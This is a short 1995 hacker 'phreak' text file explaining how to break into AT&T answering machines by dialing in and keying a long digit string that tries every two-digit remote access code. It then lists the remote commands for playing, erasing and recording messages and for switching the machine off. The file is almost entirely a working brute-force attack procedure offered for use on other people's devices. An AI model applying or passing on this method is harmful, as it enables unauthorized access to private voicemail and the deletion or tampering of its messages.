Hacking AT&T Answering Machines
Quick and Dirty by oleBuzzard
Written Today / 14-SEP-95
(c) 1995 <k0p> Communications


1. Dial telephone and wait for AT&T Answering Machine to answer.
2. Quickly Enter the following string.

       1234567898765432135792468642973147   (btw: this is the shortest
       4193366994488552277539596372582838    string for entering every
       491817161511026203040506070809001     possible 2-digit combo.)

3. You'll know you hit the code because the messages will start playing.
4. Heres a list of TouchTone(c) Commands


           Listen to messages: 7
       Listen to new messages: 6
                         Stop: #
                  Rewind Tape: 2
                 Advance Tape: 5
               Clear Messages: 3,3
                  Record memo: *
          Record Announcement: 4,*
            Play Announcement: 4,1
               Turn System On: 0
              Turn System Off: 8,8

****************************************************************************
*** oleBuzzard's kn0wledge phreak ** kn0wledge phreak World Wide Web Site **
** AC 719.578.8288 / 28.8oo-24oo ** http://www.uccs.edu/~abusby/k0p.html ***
****************************************************************************
